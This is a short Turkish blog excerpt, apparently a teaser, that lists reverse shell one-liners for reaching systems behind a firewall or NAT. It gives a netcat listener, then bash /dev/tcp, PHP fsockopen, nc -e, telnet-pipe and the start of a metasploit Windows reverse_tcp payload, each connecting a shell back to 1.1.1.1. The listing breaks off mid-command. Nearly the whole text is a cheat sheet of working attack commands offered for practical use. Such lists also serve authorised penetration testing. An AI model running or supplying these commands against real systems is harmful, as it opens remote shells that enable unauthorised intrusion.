Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

"Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri" konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;Not: Dinleme modunda "nc -lvp 443" komutu kullanılabilir.BASHbash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)PHPphp -r '$sock=fsockopen("1.1.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'Netcatnc -e /bin/sh 1.1.1.1 443Telnettelnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443Windows Reverse Shell (metasploit)#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1…
Devamı